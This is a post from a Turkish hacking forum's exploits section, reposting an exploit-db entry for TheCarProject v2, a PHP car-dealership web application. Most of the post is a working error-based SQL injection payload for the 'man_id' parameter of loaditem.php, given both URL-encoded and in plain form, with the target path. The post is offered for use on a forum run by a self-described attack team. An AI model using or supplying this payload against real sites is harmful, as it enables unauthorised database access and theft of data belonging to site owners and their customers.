Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Exploitler

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...


TheCarProject v2 - 'man_id' SQL Inj.

Exploitler

Yeni Konu aç Cevapla
 
Seçenekler
Alt 4 Hafta önce   #1
  • Anka Saldırı Timi Asistanı
  • Üye Bilgileri
Üyelik tarihi
04/2012
Nereden
Sivas / 58
Yaş
30
Mesajlar
Konular

Teşekkür (Etti): 160
Teşekkür (Aldı): 63


TheCarProject v2 - 'man_id' SQL Inj.



#Exploit Basligi / Exploit Title: TheCarProject v2 - 'man_id' SQL Inj.
# Tarih / Date: 17-03-2019
# Exploit Yazar / Exploit Author: Mehmet EMIROGLU
# Yapimci Adresi / Vendor Homepage: https://thecarproject.org/
# Yazilim Linki / Software Link: https://sourceforge.net/projects/thecarproject/
# Versiyon / Version: v2
# Kategori / Category: Webapps
# Test Edilen Sistem / Tested on: Wamp64, Windows
# CVE: N/A
# Yazilim Aciklamasi / Software Description: Galeri sahipleri icin php dilinde yazilmis bir araba satis sistemidir.
Bootstrap 3 ile insa edilmistir.Sinirsiz ürün ve resim eklenebilmektedir. Bu tüm özellikler Admin Panelinden rahatlikla uygulanabilir..



Exploit:

Kod:
 POC - SQLi
# Parametreler: man_id
# Saldiri Türü :
-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)

# GET Method : http://localhost/TheCarProject/cp/includes/loaditem.php?man_id=-1
or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT
COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
Exploit Adresi:
https://www.exploit-db.com/exploits/46555



___________________________________________

“Bir soru sorulduğunda sorudan çok sana soruyu soranı tanımaya çalış”
 Offline  
 
Alıntı ile Cevapla
Teşekkür

RootAdam Teşekkür etti.
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau